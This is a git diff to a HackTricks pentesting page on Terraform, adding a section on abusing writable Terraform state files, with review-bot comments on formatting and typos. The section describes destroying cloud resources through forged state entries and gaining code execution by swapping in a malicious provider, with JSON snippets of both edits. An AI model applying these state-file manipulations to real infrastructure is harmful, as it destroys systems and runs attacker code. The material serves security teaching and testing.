diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md
index ab0ba11121..b599284cbc 100644
--- a/pentesting-ci-cd/terraform-security.md
+++ b/pentesting-ci-cd/terraform-security.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## Basic Information
-[From the docs: ](https://developer.hashicorp.com/terraform/intro)
+[From the docs:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
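Review bot: the new `[**@hacktricks\_live**](https://twitter.com/hacktricks\_live)` line puts the backslash inside the link destination as well as the link text. That only resolves to the intended URL where the renderer processes backslash escapes in destinations; anything that reads the raw markdown gets a literal backslash in the path. Keep the URL as `https://twitter.com/hacktricks_live` and escape the link text only if it is needed. This escape and the trailing-space removal in `[From the docs:]` are formatter churn unrelated to the state-file section, so they would be easier to review as a separate commit.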
@@ -144,6 +144,55 @@ output "dotoken" {
}
```
+## Abusing Terraform State Files
+
+In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+
+### Deleting resources
+
+There are 2 ways to destroy resources:
+
+1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
+
+Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+
+```json
+{
+ "mode": "managed",
+ "type": "aws_instance",
+ "name": "example",
+ "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+ "instances": [
+ {
+ "attributes": {
+ "id": "i-1234567890abcdefg"
+ }
+ }
+ ]
+},
+```
+
+2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
+
+For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+
+### RCE
+
+It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
+
+```json
+"resources": [
+{
+ "mode": "managed",
+ "type": "scaffolding_example",
+ "name": "example",
+ "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+ "instances": [
+
+ ]
+},
+```
+
## Audit Tools
* [**tfsec**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
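Review bot: both blocks added under the json fence are fragments that do not parse as JSON. The first ends with a trailing `},` and the second opens `"resources": [` without ever closing it. Either introduce them as excerpts from the state file's `resources` array or trim them so they are valid on their own. The prose in the same section needs a proofread: "shouldn't exit" should be "shouldn't exist", and "deleted a recreated" and "delete a recreate it" should use "and". "Example from the previous page" is ambiguous, since no page precedes it; the RCE subsection's wording, "Example from the original research", would fit here too. Given that the section's premise is write access to the state file, a closing sentence on restricting and monitoring write access to the state backend would round it out for readers on the defending side.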
@@ -154,7 +203,7 @@ output "dotoken" {
* [Atlantis Security](atlantis-security.md)
* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
-
+* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
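Review bot: the reference is added by replacing the blank line that followed the list (`-` empty line, `+* [https://blog.plerion.com/...`), so the references list now runs straight into whatever comes next with no separator. Add the new bullet and keep the blank line after it.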
@@ -165,7 +214,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
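Review bot: this is the same footer change as in the first hunk, with the same problem: `https://twitter.com/hacktricks\_live` carries the escape inside the link destination. Leave the URL unescaped here as well, and keep this formatter-only change out of the content commit.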